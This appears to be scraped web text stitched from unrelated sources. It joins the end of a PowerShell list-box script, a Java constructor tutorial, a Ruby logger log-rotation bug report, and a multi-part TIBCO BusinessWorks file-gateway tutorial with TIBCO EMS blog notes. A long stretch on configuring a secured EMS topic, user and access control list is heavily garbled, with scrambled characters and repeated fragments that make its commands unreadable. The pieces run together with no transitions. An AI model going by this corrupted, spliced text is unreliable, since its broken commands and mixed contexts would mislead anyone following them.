 ForEach($i in (Get-Content c:\fso\itemlist.txt))
  { $ListBox.items.add($i) | Out-Null }
 $WinForm.Add_Shown($WinForm.Activate())
 $WinForm.showdialog() | out-null
 $ListBox.SelectedItem
} #end function Get-ListBox

# *** Entry Point to Script ***

Get-ListBox

When the script is run, the Windows form seen here is created:

MC, thanks for asking a cool question. It has been quite some time since I wrote an HTA. The last one was about 10 months ago when I created one to do temperature conversions. We used your question to kick off graphical scripting week, as we answer some of the graphical scripting questions we have been getting. Join us next week as graphical Windows PowerShell week continues. Tomorrow we will be looking at … wait, you will need to follow us on Twitter or Facebook for that information.

If you have any questions, shoot us an e-mail at scripter@microsoft.com or post it to the Official Scripting Guys Forum. See you tomorrow. Until then, peace!

Ed Wilson and Craig Liebendorfer, Scripting Guys

You really didn't answer the question asked… You sidestepped it and answered a different question. This does not help at all, did you read the question?
A constructor can be thought of as a specialized method of a class that creates (instantiates) an instance of the class and performs any initialization tasks needed for that instantiation. The syntax for a constructor is similar but not identical to a normal method and adheres to the following rules:

- The name of the constructor must be exactly the same as the class it is in.
- Constructors may be private, protected or public.
- A constructor cannot have a return type (not even void). This is what distinguishes a constructor from a method. A typical beginner's mistake is to give the constructor a return type and then spend hours trying to figure out why Java isn't calling the constructor when an object is instantiated.
- Multiple constructors may exist, but they must have different signatures, i.e. different numbers and/or types of input parameters.
- The existence of any programmer-defined constructor will eliminate the automatically generated, no-parameter, default constructor. If part of your code requires a no-parameter constructor and you wish to add a parameterized constructor, be sure to add another, no-parameter constructor.

Example

public class Person {
    private String _name;

    public Person(String name) {
        _name = name;
    }
}

The above code defines a public class called Person with a public constructor that initializes the _name field. To use a constructor to instantiate an instance of a class, we use the new keyword combined with an invocation of the constructor, which is simply its name and input parameters. new tells the Java runtime engine to create a new object based on the specified class and constructor. If the constructor takes input parameters, they are specified just as in any method. If the resultant object instance is to be referenced by a variable, then the type of the newly created object must be of the same type as the variable. (Note that the converse is not necessarily true!)
Also note that an object instance does not have to be assigned to a variable to be used.

Example

Person me = new Person("Stephen");

The above code instantiates a new Person object whose _name field has the value "Stephen".
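The overloading and default-constructor rules above can be illustrated with a short sketch. This is a hypothetical variant of the Person example, not part of the original text; the field and method names are illustrative.

```java
// Sketch illustrating overloaded constructors with different signatures,
// chaining with this(...), and an explicitly re-added no-parameter
// constructor (required once any parameterized constructor exists).
class Person {
    private String _name;
    private int _age;

    // No-parameter constructor, added back explicitly because the
    // parameterized constructors below suppress the default one.
    public Person() {
        this("unknown", 0);   // chain to the two-argument constructor
    }

    public Person(String name) {
        this(name, 0);
    }

    public Person(String name, int age) {
        _name = name;
        _age = age;
    }

    public String getName() { return _name; }
    public int getAge() { return _age; }
}
```

With this in place, both new Person() and new Person("Stephen") compile; each constructor delegates to the most specific one, so the initialization logic lives in a single place.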
Bug #7303

Logger fails on log rotation in Windows (log shifting failed. Permission denied)

Description

I have the problem that the logger fails when rotating the log file (daily) with Ruby 1.9.3 on Windows 7. The cause is that the log file is still open when it is to be renamed. This results in the error "log shifting failed. Permission denied". Log rotation will work if the log file is copied to the age_file and the logfile is then emptied using logdev.truncate(0).

My changes to logger.rb are (remove 3 lines, add 2 lines):

  def shift_log_period(period_end)
    postfix = period_end.strftime("%Y%m%d") # YYYYMMDD
    age_file = "#{@filename}.#{postfix}"
    if FileTest.exist?(age_file)
      # try to avoid filename crash caused by Timestamp change.
      idx = 0
      # .99 can be overridden; avoid too much file search with 'loop do'
      while idx < 100
        idx += 1
        age_file = "#{@filename}.#{postfix}.#{idx}"
        break unless FileTest.exist?(age_file)
      end
    end
-   @dev.close rescue nil
-   File.rename("#{@filename}", age_file)
-   @dev = create_logfile(@filename)
+   FileUtils.cp(@filename, age_file)
+   reset_logfile(@dev) # see below for this new method
    return true

I've added a new method to clean the open logfile and add a log header:

  def reset_logfile(logdev)
    logdev.truncate(0)
    logdev.sync = true
    add_log_header(logdev)
  end

The change above (copy/clean instead of rename) should also be applied to the method "shift_log_age"; the same problem exists there. I don't know how to bring this code into the standard Ruby sources. Please, somebody change the code so the bug will be fixed. (I found this bug also described in the old RubyForge archive:)

History

#1 Updated by Herman Munster over 1 year ago

Addition to my previous post: require 'fileutils' is needed at the beginning of logger.rb if using FileUtils.cp().

#2 Updated by Usaku NAKAMURA about 1 year ago

- Status changed from Open to Assigned
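The copy-then-truncate idea proposed above can be exercised outside logger.rb with a small stand-alone sketch. rotate_by_copy is a hypothetical helper name used for illustration; it is not the actual logger.rb patch.

```ruby
require 'fileutils'

# Stand-alone sketch of the copy-then-truncate rotation proposed in the
# report: instead of renaming the open log file (which fails with
# "Permission denied" on Windows), copy its contents to the archive file
# and empty the original in place, leaving any open file handle valid.
def rotate_by_copy(filename, age_file)
  FileUtils.cp(filename, age_file)   # archive the current contents
  File.truncate(filename, 0)         # empty the log without closing it
end
```

Because the original file is never closed or renamed, a process that still holds the log open can keep writing to it after rotation, which is exactly the property the rename-based approach lacks on Windows.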
02JAN 4 Votes

REVISION #1

Change 1: The following changes have been made to the ParseAndTransform process.

- Add 2 output parameters to the process. They are configured as the input parameters of the "End" activity of the process.
- empColl: this element contains a copy of the empAccumulator process variable.
- outputFileName: this element contains the output filename to be used by the downstream file writer activity.

The reason behind this design decision is that when a new data model output is required, a new sub-process will be created by the developer and deployed into the BW engine. Different ParseAndTransform processes responsible for producing different data models based on different xsds will cause different XML file names to be written by the downstream writer activity. Example: a ParseAndTransformXXX sub-process will have its output written to a file called ConsumerXXXUniqueID.xml; ParseAndTransformYYY will have its output written to a file called ConsumerYYYUniqueID.xml. These output filenames will eventually be published to interested parties.

Change 2: EmployeeDataFormat (Data Format) has been updated to contain a "Complex Element" rather than an "XML Element Reference" to demonstrate the difference between the data model of the original input file and the desired output file (employees.xsd). The Data Format defines the CSV file to contain the following fields: lastname, firstname, empNum, hireDate, department, manager.

____________

Been busy with work and done heaps of catching up with the TIBCO SOA platform. Came back from the TIBCO NOW seminar in Melbourne and got a good picture of what to expect from the TIBCO product roadmap. I have to say TIBCO's platform is nimble. They really know how to do integration and have learned a lot from their customers in specific verticals. But that is from a helicopter view. OK, let's start. This article is a part of a series of articles that describe a crude "reference implementation" of the File Gateway pattern in the book "SOA Design Patterns"
by Thomas Erl. This article explains the steps to create a file gateway that performs the following tasks:

1) A legacy system writes a batch flat-file into an inbound folder
2) The parser-transformer component polls and retrieves the flat file
3) The parser-transformer parses the data and performs data format transformation
4) The parser-transformer optionally performs data model transformation
5) The parser-transformer writes the file to an outbound folder
6) The parser-transformer optionally broadcasts/triggers an event that a file is ready for consumption

To help you visualise what we are about to build, refer to this end-state: the final product.

Due to the width and depth covered in this topic, this article is split into 4 parts. The first part talks about how to create a TIBCO BW process definition to parse and transform data models. In the second part we will be extending the parser-transformer process to write the resultant file into the outbound folder. We will also implement four more global variables to enable configuration of the inbound file path, outbound file path, semaphore file extension, as well as the file pattern to watch. The third part of this article will describe the steps to create a simple file poller process and the invocation of the parser-transformer process. The fourth part of this article will look at testing and deployment of this gateway into the TIBCO BW infrastructure, some performance tuning, and monitoring using TIBCO Hawk agents.

In the roadmap, one would hope to have, or be able to interact with, the following capabilities:

1) Publish transformation completion events to the interested parties (typically the consumers; can also be the legacy providers, provided they are capable of listening to events)
2) Pluggable architecture of schema-specific parsers/transformation engines, effectively supporting one-source, multiple-target use.
3) Load balancing via TIBCO infrastructures
4) Service call-back (pattern)
5) Protocol bridging (pattern)
6) Schema Centralisation (pattern)

We will discuss the appropriateness of items 4, 5 and 6 when time permits. The writing of this article is unrehearsed. It may and will contain errors and inaccuracies, both technically and organisationally. Your comments and corrections are very welcome. Here goes the first part. Begin with the ends in mind: here is what we will get at the end of this article.

1) Create the following folder structure in the file system. This file system is a location to exchange inbound and outbound files. It can be a folder in an ftp server or a mappable folder on the NAS. The inbound folder is for incoming files, usually file dumps performed by the legacy system. Corresponding semaphore files will also transiently exist in this folder. The outbound folder, on the other hand, holds the parsed and transformed files for the targeted consumers.

2) Create an XML schema that defines the data structure to be handled by the parser/transformer process. We created the schema using Oracle JDeveloper, based on the EMP table from the SCOTT schema. I have to admit that this tool, like many other commercial XML tools, provides a better user experience through the adoption of a widely accepted visual paradigm.

3) Create a new TIBCO Designer project. Launch the TIBCO Designer and create a new empty project; name it FileGateway.

4) Create a new folder to contain our BusinessWorks process. To create a new folder, right click on the root node in the Project Panel of the TIBCO Designer and select the "New Folder" menu item; a new folder with the default name "Folder" will be added. Rename the folder to "ParseAndTransform" directly in the Configuration Panel.

5) Import the schema of the data model output expected from this process. This schema will be referenced multiple times throughout the entire process definition, notably in the definition of the Data Format, Parse Data and other activities. To import the schema we have created in Step 2, make sure the ParseAndTransform folder is selected. Under the Project menu, select "Import Resources from File, Folder, URL…". In the "Import Resource of File…" dialogue box, select "File (.xsd, .xslt, .wsdl, *)" as the Format. In the "File:" field, click on the binocular icon to browse for your schema file. Our file is named employees.xsd. You should now have a schema appearing in the Designer Panel. Double-click the schema icon and you can inspect the schema through TIBCO Designer's schema editor. Click the "Overview" button on top to see the schema overview. We are not going to make any changes through this editor throughout this project.

6) Define the Data Format. Just as one would do when importing a CSV file into MS Excel, we will define the format, the delimiter character, the EOL character and other characteristics of the input flat file; our parser will need to know how to parse the CSV. This step involves defining an activity called "Data Format". Back in the ParseAndTransform folder, in the Designer Panel, right-click and select the "Add Resource" > Parse > "Data Format" sub-menu item. Rename the activity to "EmployeeDataFormat" and click "Apply". In the Configuration Panel, click on the "Data Format" tab; we will specify the content type as "Complex Element". Click on the "+" button and a default "root" element will be added. Rename it to "emp". Define the children elements as shown in the picture below. Click the "Apply" button to commit your changes.

Before we proceed further, let's look at what we have done:

- Created an empty TIBCO Designer project called FileGateway
- Created a new folder called ParseAndTransform in the FileGateway project
- Created an XML schema using our preferred XML authoring tool. We called that schema "employees.xsd". It contains 2 complex types and 2 elements.
- Imported the "employees.xsd" schema into the ParseAndTransform folder
- Created a Data Format that references employees.xsd; we called this Data Format "EmployeeDataFormat"

In the next step we will create a process definition that will perform the following tasks:

- Takes an input that contains filename information from an external process
- Parses the inbound file (Parse Data activity)
- Constructs the employees collection from the parsed records (Mapper activity)
- Updates a process variable that acts as an accumulator (Assign activity)

7) Add a new process under the ParseAndTransform folder. In the Designer Panel, right click and select the Process > Process Definition sub-menu item. A new process definition with the default name "Process Definition" will be added. Rename the process definition to "ParseAndTransform" directly in the Configuration Panel. This process definition will be built with the following capabilities:

- A process variable to act as an accumulator of employee records
- A configurable number of records to be grouped, for resource optimisation/tuning

8) Up to this stage, we have an empty process definition. This process will not poll the file system; the polling part will be performed by the parent process, or even a separate component, depending on our design. Instead, this process takes an input that specifies the fully qualified filename to be parsed. In this step, we need to specify the input parameter, and we will define this at the "Start" activity of the process definition. Double click on the ParseAndTransform process definition icon in the Designer Panel.

9) Define a global variable called CHUNK_SIZE of type Integer. To define a global variable, click on the Global Variables panel. Click the "abc" icon at the bottom of the Global Variables popup window and name the variable "CHUNK_SIZE", of type Integer. Assign it a default value of "3". We shall see the newly created variable appear in the Global Variables list together with other pre-defined variables. The value of this variable can be configured in the TIBCO Administrator console during deployment and would possibly be useful for performance tuning. This variable will be referenced in the "Group" for grouping records for processing.

Click on the "Start" activity icon; in the Configuration Panel, click on the "Output Editor" tab. Note: this tab is called "Output Editor" because it allows one to specify the output that will be available to all downstream activities. This "output" parameter will appear as an "input" parameter when the entire process is referenced from another activity or process. We will see how this works in the coming steps. Click the "+" sign under the "Output Editor" tab and name the parameter "inboundFileName". Specify the Content as "Element of Type" and the Type as "String". Click the "Apply" button to make the changes effective.

10) Add the necessary activities into the process definition. Add the "Parse Data" activity. Double click on the ParseAndTransform process definition; in the Designer Panel, right-click on the white space area to insert a Parse Data activity. Rename the Parse Data activity to "ParseEmpsCSV". In the configuration tab of the Configuration Panel for the ParseEmpsCSV activity, click on the binocular icon to select the Data Format created earlier. Back in the configuration tab, ensure the "Input Type" field is specified as "File". Click OK, click "Apply" and save the project.

11) Wire the "Start" and "ParseEmpsCSV" activities together. Right click on the "Start" activity and select the "Create Single Transition" menu item. Note that the cursor pointer changes to a hairline "+". Drag a line from "Start" to "ParseEmpsCSV" to represent the direction of the transition.
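Outside of TIBCO, the chunked parse-and-accumulate loop this process is being built toward (parse up to CHUNK_SIZE records per iteration, append them to an accumulator variable, stop at end of input) can be sketched as follows. The class and method names are hypothetical, not anything Designer generates.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical sketch of the Repeat-Until-True grouping idea: each
// iteration consumes up to chunkSize records and appends them to an
// accumulator, stopping once the input is exhausted (the EOF condition).
class ChunkedAccumulator {
    static List<String> accumulate(List<String> records, int chunkSize) {
        List<String> accumulator = new ArrayList<>();
        int offset = 0;
        while (offset < records.size()) {                      // not yet at EOF
            int end = Math.min(offset + chunkSize, records.size());
            accumulator.addAll(records.subList(offset, end));  // one chunk
            offset = end;
        }
        return accumulator;
    }
}
```

The point of the chunking is resource control: only CHUNK_SIZE records are materialised per iteration, so memory use stays bounded even for very large inputs, at the cost of a little bookkeeping.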
At this stage, there is no configuration required for this transition line. Click on the ParseEmpsCSV activity to continue working on it. In the configuration tab, click on the binocular icon to pick the required Data Format. In the Input Type, select "File" from the dropdown box. Click OK. Click on the input tab and map the input fields to the required process data. Two values are required. The first one is the filename, which will be mapped to the "inboundFileName" of the Start activity. The second input, noOfRecords, will be mapped to the CHUNK_SIZE global variable defined earlier. Enter a literal 0 into the SkipHeaderCharacters field, as our CSV file starts from the first column.

The next activity in the process will be the Mapper activity. This activity in our process will perform 2 functions. First, it acts as a mapper to map the output of the Parse Data activity into the final form. The second function, which is equally important, is that it will perform the "accumulation" of the employee records in every iteration of the group (to be discussed later) it operates in.

12) Add a Mapper activity and name it BuildEmpsColl. Right click on the Designer Panel to add a Mapper activity, located under the "General Activities" menu. Create a transition from ParseEmpsCSV to BuildEmpsColl. In the input editor tab, define the input parameter that this activity will take. In the input tab, we need to map 2 inputs from the process data into one employee collection. One of the process data items is the output of the ParseEmpsCSV activity; the other is the empAccumulator process variable. The parsed result from every iteration will be accumulated in the empAccumulator process variable. Right click on the emp element in the Activity Input pane and select "Duplicate". To map the process data, expand $empAccumulator in the Process Data pane and drag the child node (empColl) into the first copy of emp in the Activity Input pane. In the dialogue box, select the "For each…" option and "Make a copy of each 'emp'". Repeat the same for the output of the ParseEmpsCSV activity. Click the "Next" button.

Note that only 2 fields are automatically mapped. We will need to manually map the rest. This is because the source file (flat file) contains a different data model, and even the field names are not all the same. In the above example, the incoming CSV file contains 2 columns for a name, i.e. first name and last name. The output file (the xsd schema) has only one element, called ename, so we need to concat the fields into one. Mapper is a powerful activity that can perform many transformation tasks; refer to the TIBCO documentation for more details and examples.

13) Add an "Assign" activity to the process. Now we need to update the accumulator with the new value; we use the "Assign" activity for that. The Assign activity is under the "General Activities" palette. Name the activity "UpdateProcessVar". The process variable to update is empAccumulator. In the input tab, map the entire empColl into the process variable. Create the required transitions, including the one that transitions to the "End" activity.

We are getting there. The next step is to wrap all the activities into a group so that iteration can be performed based on groups of records. This approach is optional, but it becomes visibly important when the file size being processed is large, such as 1GB or even 2GB.

14) Group the activities. Select the activities that we want to group: ParseEmpsCSV, BuildEmpsColl and UpdateProcessVar. Multi-select can be performed by holding down the control key while selecting. Click the "Create a group" icon on the tool bar.

15) Configure the group. Select the created group; in the configuration tab, select "Repeat-Until-True" as the group action. Enter "i" as the index name and use the following XPath expression as the condition to stop the iteration:

$ParseEmpsCSV/Output/EOF = string((true()))

The expression will cause the iteration to exit when the parser (ParseEmpsCSV) encounters the EOF character in the input file. Up to now, our process definition looks like this.

16) Define the process output at the "End" activity. Click on the "End" activity. In the "Input Editor" tab, add the following elements under a default root schema called "group". You can choose another name for this root schema; I would just accept the default name "group". This will be our process output. In the "Input" tab, drag the $empAccumulator process variable into the empColl element in the Activity Input pane. When asked, just select "Make a copy of each 'empColl'". Paste the following XPath formula into the "outputFileName" element:

concat('EMP-OUTXX-', tib:format-dateTime('YYYYMMdd-HH-mm-ss', current-dateTime()), '.xml')

The first part of the output filename is hardcoded for the sake of simplicity. This is not critical, as the filename convention is specific to this particular implementation of the ParseAndTransform process. This output will be used by the downstream writer to create the XML file. Well, that is part 1.

A TIBCO BusinessWorks-based file gateway – Part 2

02JAN 2 Votes

In the previous article, we went through the steps to create a TIBCO BW process that parses a flat CSV file and transforms the data format from CSV to XML. Along the way we also transformed the data model, concatenating the firstname and lastname fields into a single element specified in the employee.xsd. This article adds a file poller process with a Render XML activity and sets up a few global variables for configuration. For now, the following are configurable:

- Inbound directory: DirInboundFolder (default "c:\fgw\inbound\")
- Outbound directory: DirOutboundFolder (default "c:\fgw\outbound\")
- Semaphore file extension: InboundSemaphoreExt (default "done")
- Semaphore extension separator: InboundSemaphoreExtSeparator (default ".")
- Search pattern: InboundSemaphorePattern (default "*")

Steps

This article assumes that you already know how to perform basic tasks in TIBCO Designer. At the end of this article, we will have something like this.

1) Add a new folder under the FileGateway root folder.

2) Add a new process definition with the name PollEmpsCSV.

3) Double-click the newly created process definition. Add a File Poller activity into the process. Note that the original "Start" activity is now replaced by the File Poller activity.

4) Configure the File Poller activity. In the Configuration tab, paste the following string into the File Name field:

%%DirInboundFolder%%%%InboundSemaphorePattern%%%%InboundSemaphoreExtSeparator%%%%InboundSemaphoreExt%%

A global variable name surrounded by double % signs will be resolved during run time. There are different ways to implement a semaphore; this design assumes that the semaphore filename without its extension is the filename to be processed. In the Advanced tab: …
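The filename derivation performed in Part 2 (dropping the semaphore separator and extension from the polled file name) can be sketched in plain Java. SemaphoreName is a hypothetical helper used for illustration, not part of the TIBCO process.

```java
// Hypothetical helper mirroring the semaphore-to-payload derivation:
// given a polled semaphore file such as "c:\fgw\inbound\emp001.txt.done",
// drop the separator (".") plus the extension ("done") to obtain the
// payload filename the parser should read.
class SemaphoreName {
    static String payloadName(String semaphoreFile,
                              String separator,
                              String extension) {
        int trailing = separator.length() + extension.length();
        return semaphoreFile.substring(0, semaphoreFile.length() - trailing);
    }
}
```

Keeping the separator and extension as parameters mirrors the global-variable design: the same derivation keeps working if the deployment changes the semaphore suffix.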
Refer to step 13 of part 1 of this article.

5) Expand the ParseAndTransform folder in the Project Panel. Drag the "ParseAndTransform" process into the PollEmpsCSV process. Wire the File Poller activity, the ParseAndTransform process and the End activity in that order. Add a Render XML activity followed by a Write File activity. The final process looks like this.

6) An input parameter has already been defined earlier in the "Start" activity of the ParseAndTransform process. This parameter holds the fully qualified name of the file to be parsed by the parser. While the Poller activity polls for the semaphore file, we need to construct the filename required. In the input tab of the ParseAndTransform sub-process, click on the pencil icon to bring up the XPath editor. Paste the following XPath formula into the formula pane:

tib:substring-before-last($PollDumpCompletion/ns:EventSourceOuputNoContentClass/fileInfo/fullName, string-length($_globalVariables/pfx:GlobalVariables/InboundSemaphoreExtSeparator) + string-length($_globalVariables/pfx:GlobalVariables/InboundSemaphoreExt))

The above XPath formula returns the filename required by the ParseEmpsCSV activity inside the sub-process. This step assumes that the semaphore filename without the extension is the filename to be processed: if the semaphore filename is c:\fgw\inbound\emp001.txt.done, then the input filename to the parser activity will be c:\fgw\inbound\emp001.txt. A semaphore is required when writing a large file that takes time to complete; this is to avoid the process reading an incomplete file. Another alternative is to rename the source file when the transfer/file creation by the legacy system has completed.

7) The ParseAndTransform sub-process provides 2 output elements in the output schema defined in its "End" activity. The Write File activity will use the filename specified in the "outputFileName" element of the ParseAndTransform output schema.

8) For the sake of simplicity, add a "Catch" activity that catches all unhandled exceptions.

A TIBCO BusinessWorks-based file gateway – Part 3

02JAN 1 Vote

Publishing an event to a TIBCO EMS topic from BusinessWorks. We have configured the TIBCO EMS to address part of this requirement; refer to this article for details of setting up the topic, user and access control list. We will look at the mechanism to publish the file processing completion events from the FileGateway. If you haven't been following the series of articles on the FileGateway, you can learn about it in the following posts:

- Part 1
- Part 2

The following use case describes the flow.

Trigger: FileGateway finished writing the XML file to the outbound folder.

Flow:
1. FileGateway publishes an event to the FGW.FILEREADY topic.
2. End of use case.

What we need:

- A target topic
- An XML schema for the event message
- A JMS Publish activity in the BusinessWorks process

The XML schema is used by both the producer and the consumer of the event message. The JMS Publish activity will publish the message according to this schema and the consumer will reference this schema when parsing the message. As usual, create the schema using your favorite XML tool. Here is the completed schema:

<?xml version="1.0" encoding="UTF-8"?>
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema"
            xmlns:fgw="http://soaplayground.kein.com/filegw/fileInfo"
            targetNamespace="http://soaplayground.kein.com/filegw/fileInfo"
            elementFormDefault="qualified">
  <xsd:element name="fileInfo">
    <xsd:complexType>
      <xsd:sequence>
        <xsd:element name="fileName" type="xsd:string"/>
        <xsd:element name="fileSize" type="xsd:int"/>
        <xsd:element name="fileDateTime" type="xsd:dateTime"/>
        <xsd:element name="transport">
          <xsd:complexType>
            <xsd:attribute name="type" type="xsd:string" use="required"/>
          </xsd:complexType>
        </xsd:element>
        <xsd:element name="property" maxOccurs="unbounded">
          <xsd:complexType>
            <xsd:attribute name="name" use="required"/>
            <xsd:attribute name="value" use="required"/>
          </xsd:complexType>
        </xsd:element>
      </xsd:sequence>
    </xsd:complexType>
  </xsd:element>
</xsd:schema>

Import the XML schema into the TIBCO Designer project. Then create a JMS Connection shared configuration: under the PollEmpsCSV folder, create a JMS Connection. Uncheck "Use JNDI for Connection Factory", as our consumers will be connecting directly without getting the resource handle from JNDI. Enter the username and password of the fgw user. Start the TIBCO EMS server and click on the "Test Connection" button to ensure correct configuration.

Here are the steps to add a publish JMS activity into the process:

1. In the PollDumpCompletion process, add a JMS Topic Publisher activity and name it "PublishEvent". In the configuration tab, enter "FGW.FILEREADY" in the Destination Topic field. In the "Message Type" dropdown, select "XML Text".
2. With the PublishEvent activity selected, go to the "Input Editor" tab. Click on the "+" icon and select "XML Element Reference" from the "Content" dropdown. Browse to the schema fileInfo.xsd and select the element "fileInfo".
3. Go to the "Input" tab and map the fileName, fileSize and fileDateTime elements of the activity input to the corresponding fields of the $WriteXMLFile process data. Duplicate the "property" element of the fileInfo instance to contain additional information, such as the username and password of the ftp server where the output file is located, the url of the ftp server, and so forth. The value of the "transport" element indicates how the output file is hosted; possible values are ftp, http, https or even a "RESTful file server"?!
4. Create a transition from WriteXMLFile to PublishEvent, and from PublishEvent to the End activity.

Here we are, done. Well, the password is in plain text; not an ideal implementation, but that is a separate exercise.

Summary of FileGateway project

02JAN 1 Vote

I realised some of the previous articles describing the FileGateway are a bit haphazard, un-organised at best. So here is a summary that I hope will clear up the mess I have introduced. Finally we have completed a conceptual FileGateway, based on some of the design patterns described in "SOA Design Patterns" by Thomas Erl: a FileGateway that broadcasts the file conversion event to interested parties. The patterns involved are:

- File Gateway
- Data Model Transformation
- Data Format Transformation
- Part of Service Broker (707)
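The event message the PublishEvent activity sends is plain XML conforming to the fileInfo schema. A consumer-side or test-harness rendering of such a payload might look like the following; FileInfoEvent is a hypothetical helper, and the namespace URI is an assumption, since the original page is only partially recoverable.

```java
// Hypothetical rendering of a fileInfo event payload. The element names
// follow the event schema discussed in Part 3; the namespace URI is an
// assumption, not confirmed by the source.
class FileInfoEvent {
    static String render(String fileName, long fileSize, String fileDateTime) {
        String ns = "http://soaplayground.kein.com/filegw/fileInfo"; // assumed
        return "<fgw:fileInfo xmlns:fgw=\"" + ns + "\">"
             + "<fgw:fileName>" + fileName + "</fgw:fileName>"
             + "<fgw:fileSize>" + fileSize + "</fgw:fileSize>"
             + "<fgw:fileDateTime>" + fileDateTime + "</fgw:fileDateTime>"
             + "</fgw:fileInfo>";
    }
}
```

A subscriber on FGW.FILEREADY would parse a message of this shape against the shared schema to learn which output file is ready and where it is hosted.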
This article describes the steps to set p the #08 for that p rpose.1 for T3+C. .0#VUbinUtibemsd.0# for win@2 installation is c:UtibcoUemsUA. #08 installation 5windows6.e.t article* we will add a new feat re to the 'ile=atewa!.1.confPfile -EMS5(OME-=#in=ti#ems&*e2e -con%ig %u00pat15to5'our5ti#ems&*con%5%i0e .o-+letion e)ent 02JAN 1 Vote 3n o r ne.e -config f llpathPtoP!o rPtibemsd.e need: • • • • a sec red topic an #08 ser a thoriTation enabled #08 access control list 5acl6 Before you start 8tart #08 server.ec te tibemsd.ast .simpl! e. 1. #08 A.ile/ateway to broad. The defa lt #08PD..e in the bin folder of !o r T3+C.Configuring TIBCO E*! for . V#08PD. . Ass ming !o have not changed the admin password* login as admin with no password.e 1.e.0#VUbinUtibemsadmin.e.1a nch #08 admin console. and se. 3n the same director! of tibemsd.e -EMS5(OME-=#in=ti#emsa&min*e2e Connect to #08 server . V#08PD.e. #08 Administration console* enter the command >connect?.e* e. Creating a to+i.ec te the tibemsadmin.uring it .3n the T3+C. .conf file.E?E!. 'or that reason we will create a ser called >fgw ser? with the password >fgw ser?. 1. create topic '=.. 1. 1.'31#7#A-4 to which the 'ile=atewa! will p blish its file completion events. a thoriTation Y enabled aut1oriBation = ena#0e& 8erver restart is re) ired if this method is sed. #nter the following commands into the admin console. . To enable a thoriTation on #08 server* enter the following command at the admin console. #nter the following commands into the admin console. set server a thoriTationYenabled set ser3er aut1oriBation=ena#0e& A thoriTation can also be t rned on via the tibemsd.@ secure To see the newl! created topic in the console* enter the following command. 1. G st to add a little sec rit! to it* we will sec re this topic b! allowing onl! a thoriTed cons mers to s bscribe* effectivel! bloc:ing the anon!mo s cons mers. show topics s1oA topics (ote the "K$ sign nder the col mn "8$* it indicates the topic is secured.. 
Creating an E*! user To access to sec red topics* the G08 cons mer needs to provide credentials when s bscribing.'31#7#A-4 sec re create topic F6>*F/.e will create a #08 topic called '=. Enable E*! aut(ori1ation The "sec re$ propert! of a #08 topic or ) e e will onl! come to effect if the server a thoriTation is enabled. show ser fgw ser s1oA user %gAuser Configure t(e a. grant topic '=.'31#7#A-4 . showacl ser fgw ser s1oAac0 user %gAuser !u--ary +! now we have config redCcreated the following: • A sec red #08 topic called '=..'31#7#A-4 s1oAac0 topic F6>*F/.7 1. (ote that in o r scenario* the cons mer is not allowed to p blish to this topic* hence the absence of "p blish$ privilege.ess . 3f the cons mer intends to become a d rable s bscriber* it also needs to be given the "d rable$ privilege.'31#7#A-4 fgw ser s bscribe* d rable grant topic F6>*F/.'31#7#A-4 topic needs at least the "s bscribe$ privilege in order to s bscribe to the topic...l3 The cons mer of '=.. #nter the following command into the admin console.@ .1..E?E!. create ser fgw ser >'ile=atewa! 2ser? passwordYfgw ser create user %gAuser )Fi0e6ateAa' User) passAor&=%gAuser 2se the following command to list the created ser. 1.ontrol list 2a.@ %gAuser su#scri#e" &ura#0e To inspect the privileges assigned to fgw ser* se the following commands 1. 1.E?E!. showacl topic '=. .0# for win@2 installation is c:UtibcoUemsUA.confPfile -EMS5(OME-=#in=ti#ems&*e2e -con%ig %u00pat15to5'our5ti#ems&*con%5%i0e .0#VUbinUtibemsd.• • • An #08 ser called fgw ser Access control on fgw ser #08 server a thoriTation Y enabled Tibco #08 Configuring TIBCO E*! for .t article* we will add a new feat re to the 'ile=atewa!.ile/ateway to broad. . #08 A.e in the bin folder of !o r T3+C.1.ast ..o-+letion e)ent 02JAN 3n o r ne.simpl! e.ec te tibemsd.e -config f llpathPtoP!o rPtibemsd.. #08 installation 5windows6.e. This article describes the steps to set p the #08 for that p rpose.e. The defa lt #08PD. 
Leave a comment
Posted by SRIK on January 2, 2012 in Tibco EMS

Tibco EMS reconnect failed (01 JAN)

This note is tested with Tibco EMS 4.4. I started a standalone Tibco EMS daemon with the following command from the directory /tibco/ems/bin:

./tibemsd -config tibemsd.conf

Unfortunately I got the following error messages for my standalone EMS server:

reconnect failed: unknown connection for id=DE
reconnect failed: unknown connection for id=FD

Before I got this error, I had done some experiments with a fault tolerant setup using the same server name in the configuration option "server" as my standalone daemon. So my first guess was to rename the EMS server, which did not help. My standalone EMS server was also using the same datastore as my previously running fault tolerant pair of EMS servers. Unfortunately renaming the EMS datastore did not solve the problem either. What might have caused it was that some EMS clients of the standalone server had crashed before I got the error. These clients were Tibco Designer 5.x instances running BusinessWorks projects. Only when shutting down my machine I saw that these clients were correctly terminated, and at restart of my machine and the EMS server the problem was solved.

Leave a comment
Posted by SRIK on January 1, 2012 in Tibco EMS

SSL Configuration in Tibco EMS
Server (25 FEB)

There is a sample SSL configuration you should start with in <tibco_home>/ems/<version>/samples/config called tibemsdssl.conf. Start it with "tibemsd -config tibemsdssl.conf". Take a look at the properties:

ssl_server_identity = ../certs/server.cert.pem
ssl_server_issuer = (server issuer certificate(s); supports PEM, DER and PKCS#12; this may be a part of the PKCS12 specified by ssl_server_identity)
ssl_server_key = ../certs/server.key.pem
ssl_server_trusted = ../certs/client_root.cert.pem (trusted issuers of client certificates; supports PEM, DER and PKCS#12)
ssl_password = $man$Ht87Cpa/LhoT:-lc#PrB<(<7r

The EMS Server is using the certificate "server.cert.pem" as its identity, and it will trust certificates that were signed by client_root.cert.pem. So you can use client_identity.p12 in your BW project as an Identity (there is a README in the certs directory explaining the relationships), and use server_root.cert.pem so you can trust the server.

There are also SSL properties for FT heartbeats:

ft_ssl_identity =
ft_ssl_issuer =
ft_ssl_private_key =
ft_ssl_password =
ft_ssl_trusted =
ft_ssl_verify_host =
ft_ssl_verify_hostname =
ft_ssl_expected_hostname =
ft_ssl_ciphers =

Leave a comment
Posted by SRIK on February 25, 2011 in Tibco EMS

Gems (Graphical Administration Tool for EMS) 18 FEB

Gems supports message management tasks such as purging messages and copying messages from a queue to another queue on a different server, as well as logging. It can be used by
JMS developers as a general purpose test and debugging tool, and by administrative support staff as a management and monitoring tool. Gems v3.2 is a graphical user interface utility for TIBCO Enterprise Message Service (EMS). Gems provides the following main features:

^Server Monitoring. Server state and main statistics are automatically updated; warning and error limits may be configured. Server generated events are also captured.
